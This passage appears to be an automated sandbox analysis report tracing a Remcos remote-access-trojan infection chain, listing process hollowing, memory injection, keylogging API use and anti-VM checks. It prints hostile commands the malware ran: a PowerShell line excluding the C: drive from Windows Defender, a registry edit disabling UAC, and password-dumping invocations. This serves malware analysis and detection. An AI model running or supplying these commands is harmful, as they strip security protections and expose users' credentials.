                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 300000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 180000
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00406AEE SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,4_2_00406AEE
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile opened: C:\Users\user\AppData\Roaming
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile opened: C:\Users\user
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile opened: C:\Users\user\AppData
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates
                    Source: remcos.exe, 0000000D.00000002.938213946.0000000002946000.00000004.00000010.sdmpBinary or memory string: od_VMware_SATA_CD00#5&28
                    Source: bin.exe, 00000003.00000003.706568314.0000000000D66000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.932281171.0000000000CEA000.00000004.00000020.sdmp, bin.exe, 00000003.00000003.706516335.0000000000D61000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.932580225.0000000000D67000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706451948.0000000000D34000.00000004.00000001.sdmp, remcos.exe, 0000000D.00000003.753230553.00000000006E9000.00000004.00000001.sdmp, remcos.exe, 0000000D.00000003.752833518.000000000295A000.00000004.00000010.sdmp, remcos.exe, 0000000D.00000003.753110347.00000000029D7000.00000004.00000010.sdmp, remcos.exe, 0000000D.00000002.936555212.00000000006E9000.00000004.00000020.sdmp, remcos.exe, 0000000D.00000002.938601311.00000000029E6000.00000004.00000010.sdmp, remcos.exe, 0000000D.00000003.752944433.00000000029C8000.00000004.00000010.sdmpBinary or memory string: Hyper-V RAW
                    Source: remcos.exe, 0000000D.00000002.936555212.00000000006E9000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\oy\
                    Source: bin.exe, 00000003.00000003.684219433.0000000000D12000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.685243322.0000000000D18000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.684299780.0000000000D0E000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: bin.exe, 00000003.00000002.932281171.0000000000CEA000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW`
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00405250
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_00405C22 FindFirstFileA,FindClose,1_2_00405C22
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_00402630 FindFirstFileA,1_2_00402630
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0040A047 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,4_2_0040A047
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00418144 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,4_2_00418144
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0040A262 FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,4_2_0040A262
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00406360 FindFirstFileW,FindNextFileW,4_2_00406360
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0040783D __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_0040783D
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00407C95 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00407C95
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00447D49 FindFirstFileExA,4_2_00447D49
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00415DC8 FindFirstFileW,FindNextFileW,FindNextFileW,4_2_00415DC8
                    Source: C:\Windows\System32\drivers\tsusbhub.sysSystem information queried: ModuleInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile Volume queried: C:\Users\user\AppData\Roaming\Microsoft\Windows FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile Volume queried: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates FullSizeInformation
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00405C49
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_6EDC2402 mov eax, dword ptr fs:[00000030h]1_2_6EDC2402
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_6EDC26C7 mov eax, dword ptr fs:[00000030h]1_2_6EDC26C7
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_6EDC2616 mov eax, dword ptr fs:[00000030h]1_2_6EDC2616
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_6EDC2744 mov eax, dword ptr fs:[00000030h]1_2_6EDC2744
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_6EDC2706 mov eax, dword ptr fs:[00000030h]1_2_6EDC2706
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0043DE2E mov eax, dword ptr fs:[00000030h]4_2_0043DE2E
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_6EDB17D3 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_6EDB17D3
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_6EDB17D3 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_6EDB17D3
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0044901D GetProcessHeap,4_2_0044901D
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\5.exeMemory allocated: page read and write | page guard
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_6EDB2A42 SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6EDB2A42
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0043060E SetUnhandledExceptionFilter,4_2_0043060E
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0043047C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0043047C
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0043753F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0043753F
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00430A6C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00430A6C

                    HIPS / PFW / Operating System Protection Evasion:

                    barindex
                    Allocates memory in foreign processesShow sources
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 1D0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 1F0000 protect: page read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                    Injects a PE file into a foreign processesShow sources
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeMemory written: C:\Users\user\Desktop\xxTzyGLZx5.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeMemory written: C:\Users\user\AppData\Roaming\Remcos\remcos.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeMemory written: C:\Users\user\AppData\Roaming\Remcos\remcos.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeMemory written: C:\Users\user\AppData\Roaming\Remcos\remcos.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Local\Temp\21.exeMemory written: C:\Users\user\AppData\Local\Temp\21.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Local\Temp\5.exeMemory written: C:\Users\user\AppData\Local\Temp\5.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Local\Temp\4.exeMemory written: C:\Users\user\AppData\Local\Temp\4.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Users\user\AppData\Roaming\Windows Update.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Contains functionality to inject code into remote processesShow sources
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00414B29 CreateProcessW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,4_2_00414B29
                    Creates a thread in another existing process (thread injection)Show sources
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeThread created: C:\Windows\SysWOW64\cmd.exe EIP: 1D010EJump to behavior
                    Adds a directory exclusion to Windows DefenderShow sources
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
                    Sample uses process hollowing techniqueShow sources
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Writes to foreign memory regionsShow sources
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 1D0000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 1F0000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
                    .NET source code references suspicious native API functionsShow sources
                    Source: 40.2.5.exe.4970000.15.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 40.2.5.exe.4970000.15.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,Sleep,CloseHandle,OpenProcess, \svchost.exe4_2_0040FB05
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeProcess created: C:\Users\user\Desktop\xxTzyGLZx5.exe "C:\Users\user\Desktop\xxTzyGLZx5.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeProcess created: C:\Users\user\AppData\Local\Temp\bin.exe "C:\Users\user\AppData\Local\Temp\bin.exe" 0Jump to behavior
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeProcess created: C:\Users\user\AppData\Local\Temp\rem9090sta.exe "C:\Users\user\AppData\Local\Temp\rem9090sta.exe" 0Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /fJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\moyvwyrrsmhoowrqsha"
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\wilgxqclgvztqcfubsndyj"
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\dwn.exe "C:\Users\user\AppData\Roaming\Remcos\dwn.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeProcess created: C:\Users\user\AppData\Local\Temp\21.exe "C:\Users\user\AppData\Local\Temp\21.exe" 0
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeProcess created: C:\Users\user\AppData\Local\Temp\5.exe "C:\Users\user\AppData\Local\Temp\5.exe" 0
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeProcess created: C:\Users\user\AppData\Local\Temp\4.exe "C:\Users\user\AppData\Local\Temp\4.exe" 0
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess created: C:\Users\user\AppData\Local\Temp\21.exe "C:\Users\user\AppData\Local\Temp\21.exe" 0
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess created: C:\Users\user\AppData\Local\Temp\5.exe "C:\Users\user\AppData\Local\Temp\5.exe" 0
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess created: C:\Users\user\AppData\Local\Temp\4.exe "C:\Users\user\AppData\Local\Temp\4.exe" 0
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe"
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe"
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2132
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00415968 StrToIntA,mouse_event,4_2_00415968
                    Source: bin.exe, 00000003.00000002.932527143.0000000000D50000.00000004.00000001.sdmpBinary or memory string: Program Manager
                    Source: bin.exe, 00000003.00000002.932256911.0000000000CE0000.00000004.00000020.sdmpBinary or memory string: Program ManagernS
                    Source: bin.exe, 00000003.00000002.939576045.0000000003B6F000.00000004.00000010.sdmp, bin.exe, 00000003.00000002.936457109.0000000001370000.00000002.00020000.sdmp, cmd.exe, 00000009.00000002.937478305.00000000033C0000.00000002.00020000.sdmp, remcos.exe, 0000000D.00000002.937515727.0000000000CD0000.00000002.00020000.sdmp, remcos.exe, 0000000D.00000002.939248564.0000000003429000.00000004.00000001.sdmpBinary or memory string: Program Manager
                    Source: bin.exe, 00000003.00000002.939597757.0000000003B7F000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.940953351.0000000003F90000.00000040.00000001.sdmpBinary or memory string: GetProgmanWindow
                    Source: bin.exe, 00000003.00000002.936457109.0000000001370000.00000002.00020000.sdmp, cmd.exe, 00000009.00000002.937478305.00000000033C0000.00000002.00020000.sdmp, remcos.exe, 0000000D.00000002.937515727.0000000000CD0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: bin.exe, 00000003.00000002.932256911.0000000000CE0000.00000004.00000020.sdmpBinary or memory string: Program ManagerPS
                    Source: remcos.exe, 0000000D.00000002.939248564.0000000003429000.00000004.00000001.sdmpBinary or memory string: Program Manager!@
                    Source: bin.exe, 00000003.00000002.936457109.0000000001370000.00000002.00020000.sdmp, cmd.exe, 00000009.00000002.937478305.00000000033C0000.00000002.00020000.sdmp, remcos.exe, 0000000D.00000002.937515727.0000000000CD0000.00000002.00020000.sdmpBinary or memory string: Progman
                    Source: remcos.exe, 0000000D.00000002.939248564.0000000003429000.00000004.00000001.sdmpBinary or memory string: Program Manager2@
                    Source: bin.exe, 00000003.00000002.932527143.0000000000D50000.00000004.00000001.sdmpBinary or memory string: Program Manager1>'
                    Source: bin.exe, 00000003.00000002.932527143.0000000000D50000.00000004.00000001.sdmpBinary or memory string: Program Manager9>?
                    Source: bin.exe, 00000003.00000002.936457109.0000000001370000.00000002.00020000.sdmp, cmd.exe, 00000009.00000002.937478305.00000000033C0000.00000002.00020000.sdmp, remcos.exe, 0000000D.00000002.937515727.0000000000CD0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                    Source: bin.exe, 00000003.00000002.932527143.0000000000D50000.00000004.00000001.sdmpBinary or memory string: Program Managerq>g
                    Source: remcos.exe, 0000000D.00000002.939248564.0000000003429000.00000004.00000001.sdmp, remcos.exe, 0000000D.00000002.938213946.0000000002946000.00000004.00000010.sdmpBinary or memory string: |Program Manager|
                    Source: bin.exe, 00000003.00000002.929737326.000000000021D000.00000004.00020000.sdmpBinary or memory string: C:\Users\user\AppData\Local\Microsoft Vision\07-12-2021_13.38.52{Program Manager}
                    Source: bin.exe, 00000003.00000002.939597757.0000000003B7F000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.940953351.0000000003F90000.00000040.00000001.sdmpBinary or memory string: SetProgmanWindow
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: EnumSystemLocalesW,4_2_00443157
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_0044B1A8
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: GetLocaleInfoA,4_2_0040D22F
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: EnumSystemLocalesW,4_2_0044B46B
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: EnumSystemLocalesW,4_2_0044B420
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: EnumSystemLocalesW,4_2_0044B506
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_0044B593
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: GetLocaleInfoW,4_2_00443640
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: GetLocaleInfoW,4_2_0044B7E3
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_0044B90C
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: GetLocaleInfoW,4_2_0044BA13
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_0044BAE0
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
